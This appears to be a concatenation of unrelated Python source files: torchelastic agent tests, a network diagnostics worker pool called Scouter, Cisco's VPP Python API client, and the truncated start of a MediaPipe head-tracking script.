self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_fault_tolerance(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(nnodes):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# restart odd agents
for i in range(nnodes):
if i % 2 != 0:
procs[i].kill()
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, nnodes, nnodes, _distributed_sum, (0,)),
)
procs[i] = p
p.start()
for i in range(nnodes):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_double_agent_elastic(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
min_size = 1
max_size = 2
run_id = str(uuid.uuid4().int)
procs = []
for _ in range(max_size):
p = multiprocessing.Process(
target=_run_agent,
args=(run_id, host, port, min_size, max_size, _distributed_sum, (0,)),
)
procs.append(p)
p.start()
# kill odd agents
for i in range(max_size):
if i % 2 != 0:
procs[i].kill()
for i in range(max_size):
if i % 2 == 0:
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_torch_rpc(self):
"""
Simple torch rpc example with torchelastic.
Creates two agents (to simulate two node job),
each agent runs a single worker. worker0 calls an rpc_sync on
worker1.
"""
# TODO upstream this to torch.distributed.rpc so that users do not have
# to redundantly set rank as part of name (e.g. worker0) AND also pass
# it explicitly as an argument to rpc.init_rpc
def init_rpc(name_prefix, backend):
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
rpc.init_rpc(
name=f"{name_prefix}{rank}",
backend=backend,
rank=rank,
world_size=world_size,
)
def worker_0(queue, msg):
init_rpc("worker", BackendType.PROCESS_GROUP)
ret = rpc.rpc_sync(to="worker1", func=echo, args=(msg,))
queue.put(ret)
rpc.shutdown()
def worker_1():
init_rpc("worker", BackendType.PROCESS_GROUP)
rpc.shutdown()
def run_agent(
run_id, etcd_host, etcd_port, start_method, worker_fn, worker_args=()
):
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{etcd_host}:{etcd_port}",
run_id=run_id,
min_nodes=2,
max_nodes=2,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role="test_trainer",
local_world_size=1,
fn=worker_fn,
args=worker_args,
rdzv_handler=rdzv_handler,
max_restarts=3,
monitor_interval=1,
)
agent = LocalElasticAgent(spec, start_method)
agent.run()
run_id = str(uuid.uuid4().int)
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
start_method = "fork"
msg = "hello world"
mp_queue = multiprocessing.get_context(start_method).Queue()
agent0 = multiprocessing.Process(
target=run_agent,
args=(run_id, host, port, start_method, worker_0, (mp_queue, msg)),
)
agent1 = multiprocessing.Process(
target=run_agent, args=(run_id, host, port, start_method, worker_1, ())
)
agent0.start()
agent1.start()
agent0.join()
agent1.join()
self.assertEqual(msg, mp_queue.get())
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_workers_drift_success(self):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _simulate_work)
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, (10,), 2, "test_trainer", {}, 30),
)
procs.append(p)
p.start()
_run_agent(*default_args, (1,), 2, "test_trainer", {}, 30)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
@patch("torchelastic.utils.store.barrier")
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_workers_drift_fail(self, barrier_mock):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = 2
run_id = str(uuid.uuid4().int)
procs = []
default_args = (run_id, host, port, nnodes, nnodes, _simulate_work)
for _ in range(nnodes - 1):
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, (60,), 2, "test_trainer", {}, 10),
)
procs.append(p)
p.start()
_run_agent(*default_args, (1,), 2, "test_trainer", {}, 10)
barrier_mock.assert_called_once()
@patch("torchelastic.utils.store.barrier")
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_barrier_failed(self, barrier_mock):
barrier_mock.side_effect = RuntimeError("test error")
spec = self._get_worker_spec(fn=_happy_function)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
barrier_mock.assert_called_once()
def test_provide_fn_and_cmd(self):
with self.assertRaises(AssertionError):
self._get_worker_spec(
fn=_bipolar_function, cmd=["test.bin"], max_restarts=2
)
def test_provide_none(self):
with self.assertRaises(AssertionError):
self._get_worker_spec(max_restarts=2)
|
main.py | # pylint: disable=locally-disabled, missing-docstring, import-error, wildcard-import, broad-except
from secrets import token_hex
import json
import threading
import multiprocessing
import uwsgi
from lib.utilities import *
def _browser_request(options, test_data):
"""Execute a browser_request test if all requirements are met."""
url = options.get("url")
if url is not None:
# Remove required arg from options to prevent duplicates.
del options["url"]
try:
test_data["result"] = browser_request(url, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'url' was not given. Please pass the required 'url' option."
def _dns_lookup(options, test_data):
"""Execute a dns_lookup test if all requirements are met."""
qname = options.get("qname")
if qname is not None:
# Remove required arg from options to prevent duplicates.
del options["qname"]
try:
test_data["result"] = dns_lookup(qname, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data["message"] = (
"Required test option of 'qname' was not given. "
"Please pass the required 'qname' option."
)
def _dns_traceroute(options, test_data):
"""Execute a dns_traceroute test if all requirements are met."""
qname = options.get("qname")
if qname is not None:
# Remove required arg from options to prevent duplicates.
del options["qname"]
try:
test_data["result"] = dns_traceroute(qname, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data["message"] = (
"Required test option of 'qname' was not given. "
"Please pass the required 'qname' option."
)
def _http_request(options, test_data):
"""Execute an http_request test if all requirements are met."""
url = options.get("url")
if url is not None:
# Remove required arg from options to prevent duplicates.
del options["url"]
try:
test_data["result"] = http_request(url, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'url' was not given. Please pass the required 'url' option."
def _ping(options, test_data):
"""Execute a ping test if all requirements are met."""
dst = options.get("dst")
if dst is not None:
# Remove required arg from options to prevent duplicates.
del options["dst"]
try:
test_data["result"] = ping(dst, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'dst' was not given. Please pass the required 'dst' option."
def _traceroute(options, test_data):
"""Execute a traceroute test if all requirements are met."""
dst = options.get("dst")
if dst is not None:
# Remove required arg from options to prevent duplicates.
del options["dst"]
try:
test_data["result"] = traceroute(dst, **options)
if not test_data["result"]["failed"]:
test_data["failed"] = False
except Exception as error:
test_data["message"] = str(error)
else:
test_data[
"message"
] = "Required test option of 'dst' was not given. Please pass the required 'dst' option."
def _worker(test):
"""Process pool worker to execute tests."""
# Check if a custom identifier was provided in the test; if not, add one.
test_id = test["options"]["id"] if test["options"].get("id") else token_hex(3)
test_data = {"id": test_id, "failed": True, "message": None, "result": {}}
# Perform tests depending on given test type.
# Parse options and ensure that requirements have been given;
# if not, append an error message to the returned data.
if test["type"] == "browser_request":
_browser_request(test["options"], test_data)
elif test["type"] == "dns_lookup":
_dns_lookup(test["options"], test_data)
elif test["type"] == "dns_traceroute":
_dns_traceroute(test["options"], test_data)
elif test["type"] == "http_request":
_http_request(test["options"], test_data)
elif test["type"] == "traceroute":
_traceroute(test["options"], test_data)
elif test["type"] == "ping":
_ping(test["options"], test_data)
else:
test_data["message"] = "Provided test type does not exist."
return {"type": test["type"], "results": test_data}
def _create_worker_pool(receipt, test_data, max_procs, stop_event):
"""Parse provided test data and ensure that all test options are properly formatted
before passing off to the worker procs in the pool. Once the tests have been completed;
update the UWSGI cache-key with the results.
Args:
receipt (str) : The UWSGI cache-key to append test results to.
test_data (dict) : The tests to execute.
max_procs (int) : The maximum number of parallel processes to be used in the worker pool
stop_event (class): Threading event class used to stop the daemon upon completion.
"""
tests = []
test_status = {"receipt": receipt, "is_running": True, "results": {}}
for (test_type, test_options) in test_data.items():
for options in test_options:
# Ensure that all options are lowercase.
options = {key.lower(): value for key, value in options.items()}
tests.append({"type": test_type, "options": options})
if test_type not in test_status["results"]:
test_status["results"][test_type] = []
uwsgi.cache_update(receipt, json.dumps(test_status), 600, "receipts")
# Execute tests in parallel.
if len(tests) < max_procs:
pool = multiprocessing.Pool(len(tests))
else:
pool = multiprocessing.Pool(max_procs)
result = pool.map(_worker, tests)
# Wait for ALL results before terminating the pool.
pool.close()
pool.join()
# Parse test results and append them to our test status.
for test in result:
test_status["results"][test["type"]].append(test["results"])
test_status["is_running"] = False
# Update the client's receipt with the current test status including test results.
uwsgi.cache_update(receipt, json.dumps(test_status), 600, "receipts")
# Ensure that the daemon is stopped after cache update.
stop_event.set()
def execute_tests(receipt, test_data, max_procs):
"""This is a glue function where every part of Scouter comes together into one.
Parse and execute tests in a background daemon thread. Pass all data to a worker pool
to perform tests in parallel. Update UWSGI with test results upon completion.
Args:
receipt (str) : The UWSGI cache-key to append test results to.
test_data (dict): The tests to execute.
max_procs (int) : The maximum number of parallel processes to be used in the worker pool.
"""
stop_event = threading.Event()
thread = threading.Thread(
target=_create_worker_pool, args=(receipt, test_data, max_procs, stop_event)
)
thread.daemon = True
thread.start()
|
vpp_papi.py | #!/usr/bin/env python
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import sys
import multiprocessing as mp
import os
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
from . vpp_serializer import VPPType, VPPEnumType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
__all__ = ('FuncWrapper', 'VPP', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum(object):
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
vpp_instance.logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
if sys.version[0] == '2':
def vpp_iterator(d):
return d.iteritems()
else:
def vpp_iterator(d):
return d.items()
class VppApiDynamicMethodHolder(object):
pass
class FuncWrapper(object):
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiJSONFiles(object):
@classmethod
def find_api_dir(cls, dirs):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'):
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
patterns. Each value in the list will have leading/trialing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir([])
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@classmethod
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
types = {}
services = {}
messages = {}
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
services.update(api['services'])
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
for m in api['messages']:
try:
messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
### OLE FIXME
self.logger.error('Not implemented error for {}'.format(m[0]))
return messages, services
class VPPApiClient(object):
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def __init__(self, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=False,
server_address='/run/vpp/api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(
"{}.{}".format(__name__, self.__class__.__name__))
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
except RuntimeError:
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
m, s = VPPApiJSONFiles.process_json_file(apidef_file)
self.messages.update(m)
self.services.update(s)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
def get_function(self, name):
return getattr(self._api, name)
class ContextId(object):
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
def get_type(self, name):
return vpp_get_type(name)
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in vpp_iterator(self.messages):
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n.encode('utf-8'))
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
if 'stream' in self.services[name] and \
self.services[name]['stream']:
multipart = True
else:
multipart = False
f = self.make_function(msg, i, multipart, do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name.encode('utf-8'), pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]).encode('utf-8'))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
self.logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _call_vpp(self, i, msgdef, multipart, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
s = 'Calling {}({})'.format(msgdef.name,
','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
self.logger.debug(s)
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
if multipart:
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
msg = self.transport.read()
if not msg:
raise VPPIOError(2, 'VPP API client: read failed')
r = self.decode_incoming_msg(msg, no_type_conversion)
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if not multipart:
rl = r
break
if msgname == 'control_ping_reply':
break
rl.append(r)
self.transport.resume()
self.logger.debug('Return from {!r}'.format(r))
return rl
def _call_vpp_async(self, i, msg, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
"""
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
kwargs['client_index'] = 0
kwargs['_vl_msg_id'] = i
b = msg.pack(kwargs)
self.transport.write(b)
def register_event_callback(self, callback):
"""Register a callback for async messages.
This will be called for async notifications in sync mode,
and all messages in async mode. In sync mode, replies to
requests will not come here.
callback is a fn(msg_type_name, msg_type) that will be
called when a message comes in. While this function is
executing, note that (a) you are in a background thread and
may wish to use threading.Lock to protect your datastructures,
and (b) message processing from VPP will stop (so if you take
a long while about it you may provoke reply timeouts or cause
VPP to fill the RX buffer). Passing None will disable the
callback.
"""
self.event_callback = callback
def thread_msg_handler(self):
"""Python thread calling the user registered message handler.
This is to emulate the old style event callback scheme. Modern
clients should provide their own thread to poll the event
queue.
"""
while True:
r = self.message_queue.get()
if r == "terminate event thread":
break
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def __repr__(self):
return "<VPPApiClient apifiles=%s, testmode=%s, async_thread=%s, " \
"logger=%s, read_timeout=%s, use_socket=%s, " \
"server_address='%s'>" % (
self._apifiles, self.testmode, self.async_thread,
self.logger, self.read_timeout, self.use_socket,
self.server_address)
# Provide the old name for backward compatibility.
VPP = VPPApiClient
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
FaceTracker.py | from threading import Thread
import cv2
import mediapipe as mp
import time
import math
import numpy as np
mp_face_mesh = mp.solutions.face_mesh
#USER MUST UPDATE THE FOLLOWING
camhfov = 80 #camera horizontal field of view, DEGREES
camvfov = 39 #camera vertical field of view
camxres = 1280 #camera x resolution
camyres = 720
cameraOffset = 4.75 #from center of screen, up is positive, inches. Program assumes camera is centered over or under the screen, with positive value being over.
#cameraOffset = 1.75 #for recording with a camera below the face adjust this
screenWidth = 15.04 #inches
screenHeight = 8.44 #inches
screenResolution = (1920,1080)
userHead = 3400 #user head size scales only distance estimate, adjust this value until distance is correct. There's a print(distance) down there to help with this process, see README file.
scrnW = screenWidth/2
scrnH = screenHeight/2
pixperinch = screenResolution[0] / screenWidth
distance = 45 #arbitrary, quickly overwritten with real values
distance2 = 45
distance3 = 45
starttime = time.time()
frames = 0
tracking = False
def getAngle(a, b, c):
ang = math.degrees(math.atan2(c[1]-b[1], c[0]-b[0]) - math.atan2(a[1]-b[1], a[0]-b[0]))
return ang + 360 if ang < 0 else ang
face_mesh = mp_face_mesh.FaceMesh(static_image_mode=False, max_num_faces=1,
min_detection_confidence=0.4,
min_tracking_confidence=0.4)
class FaceTracker:
def __init__(self, frame=None):
self.frame = frame
self.headxyz = [0, 0, 24, time.time()]
self.stopped = False
#self.tracking = False
def start(self):
Thread(target=self.track, args=()).start()
return self
def track(self):
while not self.stopped:
#cv2.imshow("Video", self.frame)
#if cv2.waitKey(1) == ord("q"):
#self.stopped = True
#print("facetracker worked")
results = face_mesh.process(self.frame)
if results.multi_face_landmarks:
#This is where the user's head location is calculated.
#Mediapipe does not give any sort of value for distance measurement, so we have to figure it out based on how far apart the eyes are.
#Mediapipe outputs landmark locations as on-screen coordinates -1 to 1, so we must scale them to pixel values (do we?)
eyesh = ( ( (results.multi_face_landmarks[0].landmark[33].x + results.multi_face_landmarks[0].landmark[263].x) / 2) * camhfov - (camhfov/2)) #Calculate the angle from the center of the webcam's FOV to the center of the user's eyes
eyesv = ( ( (results.multi_face_landmarks[0].landmark[33].y + results.multi_face_landmarks[0].landmark[263].y) / 2) * camvfov - (camvfov/2))
shape = self.frame.shape
eyesx = int(( (results.multi_face_landmarks[0].landmark[33].x + results.multi_face_landmarks[0].landmark[263].x) / 2) * shape[1]) #Convert to pixel values for use in drawing tracked location if desired
eyesy = int(( (results.multi_face_landmarks[0].landmark[33].y + results.multi_face_landmarks[0].landmark[263].y) / 2) * shape[0])
nosex = int(results.multi_face_landmarks[0].landmark[4].x * shape[1]) #Get the nose pixel coodinates, this is to help with when the user turns thier head left/right and shrinks the distance between thier eyes
nosey = int(results.multi_face_landmarks[0].landmark[4].y * shape[0])
nosetopx = int(results.multi_face_landmarks[0].landmark[6].x * shape[1]) #We're making a line between the top and bottom of the user's nose
nosetopy = int(results.multi_face_landmarks[0].landmark[6].y * shape[0])
nosebottomx = int(results.multi_face_landmarks[0].landmark[164].x * shape[1])
nosebottomy = int(results.multi_face_landmarks[0].landmark[164].y * shape[0])
reyex = int(results.multi_face_landmarks[0].landmark[33].x * shape[1]) #Get x and y coordinates for left and right eyes
reyey = int(results.multi_face_landmarks[0].landmark[33].y * shape[0])
leyex = int(results.multi_face_landmarks[0].landmark[263].x * shape[1])
